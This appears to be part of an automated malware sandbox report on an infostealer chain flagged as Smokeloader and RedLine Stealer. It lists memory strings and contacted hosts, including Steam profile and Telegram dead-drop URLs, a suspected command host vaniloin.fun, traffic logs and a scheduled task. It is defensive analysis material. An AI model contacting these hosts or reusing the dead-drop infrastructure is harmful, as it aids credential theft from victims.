Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199747278259[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199747278259[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: build_2024-07-25_20-56.exe, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.000000000254F000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259LeI
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259X6I
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.000000000254F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259k
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: build_2024-07-25_20-56.exe, build_2024-07-25_20-56.exe, 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://t.me/armad2a
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
Source: server.exe, 00000009.00000002.2949296578.00000215477C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vaniloin.fun/
Source: server.exe, 00000009.00000002.2949630589.0000021547895000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic
Source: server.exe, 00000009.00000002.2949630589.0000021547895000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic06
Source: server.exe, 00000009.00000002.2949630589.00000215478AE000.00000004.00001000.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949425012.0000021547805000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949425012.00000215477E6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949630589.00000215478BC000.00000004.00001000.00020000.00000000.sdmp, server.exe, 00000009.00000003.2938513902.00000215477E6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000003.2938342842.0000021547805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic?zejw3gqwmp0vw=R8%2Fu9J%2Bj64IFw9x63%2F9aOpnzREOZKM709Pyrb
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3367211435.0000000019990000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2996603846.000000001906C000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3367211435.0000000019990000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 60848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60817
Source: unknown	Network traffic detected: HTTP traffic on port 60831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60850
Source: unknown	Network traffic detected: HTTP traffic on port 60815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60815
Source: unknown	Network traffic detected: HTTP traffic on port 60829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60812
Source: unknown	Network traffic detected: HTTP traffic on port 60803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60829
Source: unknown	Network traffic detected: HTTP traffic on port 60820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60783
Source: unknown	Network traffic detected: HTTP traffic on port 60807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60820
Source: unknown	Network traffic detected: HTTP traffic on port 60800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60793
Source: unknown	Network traffic detected: HTTP traffic on port 60798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60805
Source: unknown	Network traffic detected: HTTP traffic on port 60805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60803
Source: unknown	Network traffic detected: HTTP traffic on port 60793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60800

Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:60783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:60785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.6:60800 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000002.3355199740.00000000024FD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

PE file contains section with special chars

Source: IRqsWvBBMc.exe	Static PE information: section name:
Source: IRqsWvBBMc.exe	Static PE information: section name: .idata
Source: IRqsWvBBMc.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2CB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	10_2_6C2CB700
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2CB8C0 rand_s,NtQueryVirtualMemory,	10_2_6C2CB8C0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C2CB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	10_2_6C2CB910
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C26F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	10_2_6C26F280

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_008FE440	7_2_008FE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_008F4CF0	7_2_008F4CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00933068	7_2_00933068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00927D83	7_2_00927D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00989680	7_2_00989680
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_008F4AF0	7_2_008F4AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0093765B	7_2_0093765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00932BD0	7_2_00932BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00936F09	7_2_00936F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00938720	7_2_00938720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0093777B	7_2_0093777B
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Code function: 9_2_00007FF683127058	9_2_00007FF683127058
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Code function: 9_2_00007FF683139060	9_2_00007FF683139060
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Code function: 9_2_00007FF6831300E0	9_2_00007FF6831300E0
